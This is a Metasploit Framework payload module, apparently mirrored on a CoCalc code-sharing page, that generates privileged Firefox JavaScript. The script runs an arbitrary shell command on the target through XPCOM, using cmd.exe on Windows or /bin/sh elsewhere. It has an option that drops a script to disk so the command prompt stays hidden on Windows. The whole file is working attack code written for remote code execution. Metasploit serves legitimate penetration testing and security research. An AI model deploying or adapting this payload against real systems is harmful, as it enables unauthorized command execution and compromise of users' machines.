Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/firefox/exec.rb
19516 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
module MetasploitModule
7
CachedSize = 1019
8
9
include Msf::Payload::Single
10
include Msf::Payload::Firefox
11
12
def initialize(info = {})
13
super(
14
merge_info(
15
info,
16
'Name' => 'Firefox XPCOM Execute Command',
17
'Description' => %q{
18
This module runs a shell command on the target OS without touching the disk.
19
On Windows, this command will flash the command prompt momentarily.
20
This can be avoided by setting WSCRIPT to true, which drops a jscript
21
"launcher" to disk that hides the prompt.
22
},
23
'Author' => ['joev'],
24
'License' => BSD_LICENSE,
25
'Platform' => 'firefox',
26
'Arch' => ARCH_FIREFOX
27
)
28
)
29
register_options([
30
OptString.new('CMD', [true, 'The command string to execute', 'touch /tmp/a.txt']),
31
OptBool.new('WSCRIPT', [true, 'On Windows, drop a vbscript to hide the cmd prompt', false])
32
])
33
end
34
35
def generate(_opts = {})
36
<<-EOS
37
38
(function(){
39
window = this;
40
#{read_file_source if datastore['WSCRIPT']}
41
#{run_cmd_source if datastore['WSCRIPT']}
42
43
var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
44
.getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
45
var windows = (ua.indexOf("Windows")>-1);
46
47
var cmd = (#{JSON.unparse({ cmd: datastore['CMD'] })}).cmd;
48
if (#{datastore['WSCRIPT']} && windows) {
49
runCmd(cmd);
50
} else {
51
var process = Components.classes["@mozilla.org/process/util;1"]
52
.createInstance(Components.interfaces.nsIProcess);
53
var sh = Components.classes["@mozilla.org/file/local;1"]
54
.createInstance(Components.interfaces.nsILocalFile);
55
var args;
56
if (windows) {
57
sh.initWithPath("C:\\\\Windows\\\\System32\\\\cmd.exe");
58
args = ["/c", cmd];
59
} else {
60
sh.initWithPath("/bin/sh");
61
args = ["-c", cmd];
62
}
63
process.init(sh);
64
process.run(true, args, args.length);
65
}
66
})();
67
68
EOS
69
end
70
end
71
72